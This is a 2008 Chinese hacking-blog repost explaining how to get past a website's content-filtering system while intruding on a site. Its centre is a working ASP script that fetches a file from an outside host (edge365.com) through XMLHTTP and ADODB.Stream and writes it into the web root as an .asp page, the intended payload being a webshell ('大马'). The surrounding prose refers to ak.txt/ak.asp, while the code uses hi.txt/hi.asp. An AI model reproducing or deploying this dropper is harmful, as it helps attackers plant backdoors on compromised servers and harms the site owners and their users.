以前遇到过这种情况,今天看到就转过来了
在我们入侵网站的过程中,有时候提交我们的大马或者其它ASP文件的时候,会被一流信息监控系统所拦截,这是因为它设置了限制提交字符。
既然它不允许我们进行提交,那我们可以采用下载的方法。这个就好比我们上传大EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标 文件下载到本地服务器中。好了,这个方法就是,只要服务器没有禁用XML和数据流组件,我们可以往服务器中提交以下ASP脚本文件
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://edge365.com/hi.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("hi.asp"),2
set sGet = nothing
set sPOST = nothing
response.Write("下载文件成功!
")
%>
利用服务器的XML和数据流组件,从我的blog的ak.txt的内容下载到目标站点根目录并保存为ak.asp。
ak.txt中的内容当然就是被拦截的内容了。之后访问这个提交的ASP网页文件,会出现一片空白,然后我们再访问这个ak.asp文件,则想要上传的内容已经被保存成功!
突破一流信息监控系统实现文件“上传”
Tags:技巧
添加书签: [QQ书签] [百度搜藏] [新浪ViVi] [365Key网摘] [天极网摘] [我摘] [POCO网摘] [和讯网摘]
2008-4-26 6:44:15 | 发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
- 相关文章:
sql相关恢复xp_cmdshell命令及其他 (2008-4-18 0:37:49)
unicode新用法 (2008-4-16 12:52:36)
用ASP打开远端MDB文件的方法 (2008-4-16 12:39:41)
一个linux pentest 关于pty的小技巧 (2008-4-3 0:41:41)
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。